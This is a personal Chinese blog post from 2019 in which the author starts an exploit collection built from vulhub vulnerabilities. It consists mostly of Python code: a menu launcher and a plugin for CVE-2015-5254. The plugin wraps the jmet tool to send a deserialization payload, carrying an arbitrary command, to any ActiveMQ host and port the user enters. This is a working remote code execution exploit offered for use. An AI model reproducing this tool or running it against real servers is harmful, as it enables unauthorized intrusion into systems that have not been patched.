Vulnerability project
前言
今天下午有个想法,嗯。暂时不得而知是什么想法,也就是写漏洞利用的项目吧。距离过年还有半个月左右,感觉越大过年没什么滋味了,小时候的朋友全部都分道扬镳。都是常规操作:
拜年——>收钱
别人过来你这<—–送钱
剩余时间:待在房间干自己的事情
正文
https://vulhub.org/
我打算把这里的漏洞全部复现一遍,然后写个漏洞利用集合体
刚刚复现完的第一个:
CVE-2015-5254
这里就不重复了,直接看代码吧:
目录结构
├─arms
│ └─jmet-master
│ ├─external
│ ├─scripts
│ └─src
│ ├─assembly
│ └─main
│ ├─java
│ │ └─de
│ │ └─codewhite
│ │ └─jmet
│ │ ├─exceptions
│ │ ├─filter
│ │ ├─messagetexts
│ │ ├─payload
│ │ │ └─impl
│ │ ├─target
│ │ │ └─impl
│ │ ├─types
│ │ └─wrapper
│ └─resources
├─doc
└─plugin
主要的脚本:
haq520.py
#author:九世
#time:2019/1/16
try:
import readline
except:
pass
import time
class Main:
def cve_2015_5254(self):
obj=__import__('plugin.CVE-2015-5254',fromlist=True) #导入了plugin文件里的CVE-2015-2524
daoru=getattr(obj,'jiancha') #调用了jiancha()函数,此时:daoru=jiancha()
daoru()
time.sleep(1)
daoru2=getattr(obj,'run')
ips=input('IP:')
ports=input('port:')
execs=input('exec:')
daoru2(execs,ips,ports)
if __name__ == '__main__':
obj=Main()
exp_list=['[1] CVE-2015-5254']
exp_cat={'1':obj.cve_2015_5254}
while True:
print('[h] exploit select:)')
for e in exp_list:
print(e)
print('')
print('')
user=input('select:>')
if user in exp_cat:
exp_cat.get(user)()
print('')
print('')
elif user=='exit':
break
else:
print('[e] Not Found select')
print('')
print('')
continue
plugin插件里面的CVE-2015-5254
#author:九世
#time:2019/1/16
import os
import re
def jiancha():
if os.path.exists('arms/jmet-master'):
print('[h] Found arms/jmet-master')
else:
print('[q] Not Found arms/jmet-marser....')
exit()
def run(execq,ip,port):
execs='java -jar arms/jmet-master/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "{}" -Yp ROME {} {}'.format(execq,ip,port)
zx=os.popen(execs)
zhenze=re.findall('ID:.*',str(zx.read()))
if len(zhenze)>0:
print('[a] Found CVE-2015-5254')
for i in zhenze:
print(i)
else:
print('[q] Not Found CVE-2015-5254')
测试效果:
这世界上所有的劣势都是由当事人的能力不足所造成的
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:Vulnerability project
本文作者:九世
发布时间:2019-01-16, 17:34:10
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/b780d8aa.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。